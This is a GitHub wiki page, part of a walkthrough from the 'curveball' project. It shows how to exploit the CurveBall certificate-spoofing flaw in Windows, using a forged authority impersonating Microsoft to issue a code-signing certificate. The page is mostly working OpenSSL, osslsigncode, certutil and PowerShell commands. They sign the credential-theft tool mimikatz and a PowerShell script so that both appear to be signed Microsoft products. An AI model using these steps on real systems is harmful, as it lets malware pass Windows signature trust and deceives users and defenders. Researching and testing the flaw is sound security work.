2. Kiwi Legit CodeSigning - gentilkiwi/curveball GitHub Wiki
Now that you have a Certificate Authority [...]
OpenSSL shared configuration for CodeSigning
Create a cs.cnf OpenSSL config file with
extensions = extensions
[req]
prompt = no
utf8 = no
distinguished_name = req_distinguished_name
x509_extensions = extensions
[req_distinguished_name]
[extensions]
basicConstraints=critical, CA:FALSE
subjectKeyIdentifier=hash
keyUsage=critical, digitalSignature
extendedKeyUsage=codeSigning
# crlDistributionPoints=crlDistributionPoint
#
# [crlDistributionPoint]
- CRL Distribution Point may make the pseudo-validation fail.
Create RSA private key & signed certificate with the legit authority
openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out cs_microsoft_product.key
openssl req -config cs.cnf -new -sha256 -key cs_microsoft_product.key -subj "/C=FR/CN=Kiwi Microsoft ECC Product Code Signing" -out cs_microsoft_product.csr
openssl x509 -req -extfile cs.cnf -in cs_microsoft_product.csr -CA microsoft_product.crt -CAkey ./private/CACA93B9D23D2B6FA76E8B8471931E0DF3EC6F63AF3CDBB936C41954A1872326.key -CAcreateserial -out cs_microsoft_product.crt -days +1825
Must give you:
Signature ok
subject=C = FR, CN = Kiwi Microsoft ECC Product Code Signing
Getting CA Private Key
and files: cs_microsoft_product.key & cs_microsoft_product.crt (you can delete cs_microsoft_product.csr & microsoft_product.srl)
Use the CodeSigning certificate
Authenticode with osslsigncode
PE (exe/dll/sys/...), MSI & CAB
cat cs_microsoft_product.crt microsoft_product.crt ./public/CACA93B9D23D2B6FA76E8B8471931E0DF3EC6F63AF3CDBB936C41954A1872326.crt > cs_microsoft_product.legit_with_real.crt
to have a bundle with the code signing certificate + the legit certificate authority + the real one: it will 'force' Windows to acquire the real one if not already in the root certificate store.`
osslsigncode sign -certs cs_microsoft_product.legit_with_real.crt -key cs_microsoft_product.key -n "mimikatz 2.2.0" -i http://blog.gentilkiwi.com/mimikatz -t http://timestamp.digicert.com -in ../mimikatz/x64/mimikatz.exe -out mimikatz_microsoft_product.exe -h sha1
osslsigncode sign -certs cs_microsoft_product.legit_with_real.crt -key cs_microsoft_product.key -n "mimikatz 2.2.0" -i http://blog.gentilkiwi.com/mimikatz -t http://timestamp.digicert.com -in mimikatz_microsoft_product.exe -out mimikatz_microsoft_product.exe -h sha256 -nest
Results
PowerShell script
PowerShell needs the certificate to be installed on the signer computer, or a PKCS12#12. Here we use the installed certificate to be able to include the certificate authority in the chain.
Unfortunately, it's not natively possible to include the real authority. Be sure to select a certificate authority already on the system (like the Microsoft one in modern Windows 10 version)
openssl pkcs12 -export -password pass:waza -keysig -in cs_microsoft_product.crt -inkey cs_microsoft_product.key -out cs_microsoft_product.p12
Import certificates
on the signer computer
certutil -user -f -addstore root c:\security\curveball\microsoft_product.crt
certutil -user -f -p waza -importpfx c:\security\curveball\cs_microsoft_product.p12 NoChain,AT_SIGNATURE
Sign hello.ps1
on the signer computer
powershell -Command "Set-AuthenticodeSignature -Certificate (Get-ChildItem -Path 'Cert:\CurrentUser\My' -CodeSigningCert | Where-Object {$_.Subject -EQ 'CN=Kiwi Microsoft ECC Product Code Signing, C=FR'}) -IncludeChain 'All' -HashAlgorithm 'SHA256' -TimestampServer 'http://timestamp.digicert.com' -FilePath 'hello.ps1'"
Results
# if not already in a signed policy (see: Get-ExecutionPolicy -List)
Set-ExecutionPolicy -Scope Process -ExecutionPolicy AllSigned -Force
# if you want to compare with another one
.\Desktop\hello_not_signed.ps1
# your signed script
.\Desktop\hello.ps1
